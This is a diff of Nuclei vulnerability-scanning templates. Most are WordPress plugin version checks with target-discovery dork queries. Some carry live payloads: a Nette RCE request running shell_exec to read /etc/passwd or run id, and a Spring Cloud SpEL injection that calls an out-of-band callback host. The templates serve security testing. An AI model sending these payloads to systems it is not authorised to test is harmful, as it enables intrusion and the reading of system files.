b/poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml new file mode 100644 index 0000000000..d441e4e011 --- /dev/null +++ b/poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f + +info: + name: > + Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor <= 2.0.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via data-jltma-wrapper-link Element + author: topscoder + severity: low + description: > + The Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-jltma-wrapper-link element in all versions up to, and including 2.0.6.4 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-6282 + metadata: + fofa-query: "wp-content/plugins/master-addons/" + google-query: inurl:"/wp-content/plugins/master-addons/" + shodan-query: 'vuln:CVE-2024-6282' + tags: cve,wordpress,wp-plugin,master-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/master-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "master-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml b/poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml new file mode 100644 index 0000000000..d4dc172250 --- /dev/null +++ b/poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7493-827cf828502e280939934bc36fcd15c8 + +info: + name: > + WPCOM Member <= 1.5.2.1 - Unauthenticated Privilege Escalation via User Meta + author: topscoder + severity: critical + description: > + The WPCOM Member plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.5.2.1. This is due to the plugin allowing arbitrary data to be passed to wp_insert_user() during registration. This makes it possible for unauthenticated attackers to update their role to that of an administrator during registration. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec7f3e0c-a07c-4082-9b6b-12d0fbe0fdc8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-7493 + metadata: + fofa-query: "wp-content/plugins/wpcom-member/" + google-query: inurl:"/wp-content/plugins/wpcom-member/" + shodan-query: 'vuln:CVE-2024-7493' + tags: cve,wordpress,wp-plugin,wpcom-member,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpcom-member/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpcom-member" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml b/poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml new file mode 100644 index 0000000000..c030b8c755 --- /dev/null +++ b/poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘content’ parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7618 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7618' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml b/poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml new file mode 100644 index 0000000000..db12dd5f7c --- /dev/null +++ b/poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7655-cb8797e18cf270e181c88790358f477b + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ee611-ae81-4736-b4f0-b9d06714da18?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7655 + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:CVE-2024-7655' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml b/poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml new file mode 100644 index 0000000000..99dbff5181 --- /dev/null +++ b/poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5 + +info: + name: > + Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress <= 6.5.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 6.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted upload permissions by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cae7702-e531-45b9-9131-42edbc073a07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7770 + metadata: + fofa-query: "wp-content/plugins/file-manager/" + google-query: inurl:"/wp-content/plugins/file-manager/" + shodan-query: 'vuln:CVE-2024-7770' + tags: cve,wordpress,wp-plugin,file-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/file-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "file-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.5.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml b/poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml new file mode 100644 index 0000000000..70a64adb5b --- /dev/null +++ b/poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487 + +info: + name: > + Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The Nova Blocks by Pixelgrade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute of the 'wp:separator' Gutenberg block in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8241 + metadata: + fofa-query: "wp-content/plugins/nova-blocks/" + google-query: inurl:"/wp-content/plugins/nova-blocks/" + shodan-query: 'vuln:CVE-2024-8241' + tags: cve,wordpress,wp-plugin,nova-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nova-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml b/poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml new file mode 100644 index 0000000000..04a2ca8f4e --- /dev/null +++ b/poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95 + +info: + name: > + Frontend Dashboard <= 2.2.4 - Authenticated (Subscriber+) Arbitrary Function Call + author: topscoder + severity: low + description: > + The Frontend Dashboard plugin for WordPress is vulnerable to unauthorized code execution due to insufficient filtering on callable methods/functions via the ajax_request() function in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to call arbitrary functions that can be leverage for privilege escalation by changing user's passwords. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8268 + metadata: + fofa-query: "wp-content/plugins/frontend-dashboard/" + google-query: inurl:"/wp-content/plugins/frontend-dashboard/" + shodan-query: 'vuln:CVE-2024-8268' + tags: cve,wordpress,wp-plugin,frontend-dashboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/frontend-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "frontend-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml b/poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml new file mode 100644 index 0000000000..60b20be14f --- /dev/null +++ b/poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8369-371892027f1c271d3247dba36b384fb8 + +info: + name: > + EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure + author: topscoder + severity: high + description: > + The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8369 + metadata: + fofa-query: "wp-content/plugins/eventprime-event-calendar-management/" + google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/" + shodan-query: 'vuln:CVE-2024-8369' + tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventprime-event-calendar-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml b/poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml new file mode 100644 index 0000000000..5a81f81be5 --- /dev/null +++ b/poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf + +info: + name: > + Affiliate Super Assistent <= 1.5.3 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: high + description: > + The The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.5.3. This is due to the software allowing users to supply arbitrary shortcodes in comments when the 'Parse comments' option is enabled. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-8478 + metadata: + fofa-query: "wp-content/plugins/amazonsimpleadmin/" + google-query: inurl:"/wp-content/plugins/amazonsimpleadmin/" + shodan-query: 'vuln:CVE-2024-8478' + tags: cve,wordpress,wp-plugin,amazonsimpleadmin,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/amazonsimpleadmin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "amazonsimpleadmin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml b/poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml new file mode 100644 index 0000000000..c639b730bb --- /dev/null +++ b/poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10 + +info: + name: > + Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Slider comparison image before and after plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [sciba] shortcode in all versions up to, and including, 0.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8543 + metadata: + fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/" + google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/" + shodan-query: 'vuln:CVE-2024-8543' + tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-comparison-image-before-and-after" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.3') \ No newline at end of file diff --git a/poc/cve/cve-2016-1000154.yaml b/poc/cve/cve-2016-1000154.yaml index 6080409f32..dfbff06092 100644 --- a/poc/cve/cve-2016-1000154.yaml +++ b/poc/cve/cve-2016-1000154.yaml @@ -5,17 +5,13 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin whizz v1.0. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - - https://wordpress.org/plugins/whizz - - http://www.securityfocus.com/bid/93538 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000154 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2019-2579.yaml b/poc/cve/cve-2019-2579.yaml index f54804eb17..b8cc27c5e2 100644 --- a/poc/cve/cve-2019-2579.yaml +++ b/poc/cve/cve-2019-2579.yaml @@ -1,20 +1,19 @@ id: CVE-2019-2579 info: - name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection + name: Oracle WebCenter Sites - SQL Injection author: leovalcante severity: medium - description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. + description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://github.com/Leovalcante/wcs_scanner - - https://nvd.nist.gov/vuln/detail/CVE-2019-2579 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html + tags: cve,cve2019,oracle,wcs,sqli classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 + cvss-score: 4.30 cve-id: CVE-2019-2579 - tags: cve,cve2019,oracle,wcs,sqli + requests: - raw: @@ -49,6 +48,4 @@ requests: - type: status status: - - 200 - -# Enhanced by mp on 2022/05/04 + - 200 \ No newline at end of file diff --git a/poc/cve/cve-2020-15227.yaml b/poc/cve/cve-2020-15227.yaml index e483393043..2adba03624 100644 --- a/poc/cve/cve-2020-15227.yaml +++ b/poc/cve/cve-2020-15227.yaml @@ -1,34 +1,28 @@ id: CVE-2020-15227 info: - name: Nette Framework RCE - author: becivells - severity: critical - description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 - - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + name: nette Framework RCE + author: hackergautam + severity: high + reference: unknown tags: cve,cve2020,nette,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-15227 - cwe-id: CWE-74 requests: - method: GET path: - - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" + - "{{BaseURL}}/index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1" matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" + - type: word + words: + - "uid" + - "gid" + part: body + condition: and - type: status status: - 200 + diff --git a/poc/cve/cve-2021-24335.yaml b/poc/cve/cve-2021-24335.yaml index ac8f6d3f89..89d2be4bec 100644 --- a/poc/cve/cve-2021-24335.yaml +++ b/poc/cve/cve-2021-24335.yaml @@ -5,17 +5,13 @@ info: author: daffainfo severity: medium description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-24335 - - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557 - - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt - - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 + tags: cve,cve2021,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-24335 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/default/huawei-HG532e-default-login.yaml b/poc/default/huawei-HG532e-default-login.yaml index 2ebc7ab348..5b907dd987 100644 --- a/poc/default/huawei-HG532e-default-login.yaml +++ b/poc/default/huawei-HG532e-default-login.yaml @@ -1,17 +1,11 @@ id: huawei-HG532e-default-login info: name: Huawei HG532e Default Credential - description: Huawei HG532e default admin credentials were discovered. author: pussycat0x severity: high metadata: shodan-query: http.html:"HG532e" tags: default-login,huawei - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: - | @@ -34,5 +28,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/google/google-secrets.yaml b/poc/google/google-secrets.yaml index a689838b9d..d9cb5cef3a 100644 --- a/poc/google/google-secrets.yaml +++ b/poc/google/google-secrets.yaml @@ -15,21 +15,21 @@ file: extractors: - type: regex - name: google-api-key + name: facebook-access-token regex: - - "AIza[0-9A-Za-z\\\\-_]{35}" + - "EAACEdEose0cBA[0-9A-Za-z]+" - type: regex - name: google-cloud-platform-api-key + name: facebook-client-id regex: - - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" + - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" - type: regex - name: google-oauth + name: facebook-oauth regex: - - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" + - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" - type: regex - name: google-oauth-access-token + name: facebook-secret-key regex: - - "ya29\\\\.[0-9A-Za-z\\\\-_]+" + - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" diff --git a/poc/java/spring-functions-rce.yaml b/poc/java/spring-functions-rce.yaml index 39a36176e1..f28360d6a7 100644 --- a/poc/java/spring-functions-rce.yaml +++ b/poc/java/spring-functions-rce.yaml @@ -1,56 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. - remediation: | - Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94,CWE-917 - epss-score: 0.97537 - epss-percentile: 0.99993 - cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: vmware - product: spring_cloud_function - tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 -http: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} +requests: + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - 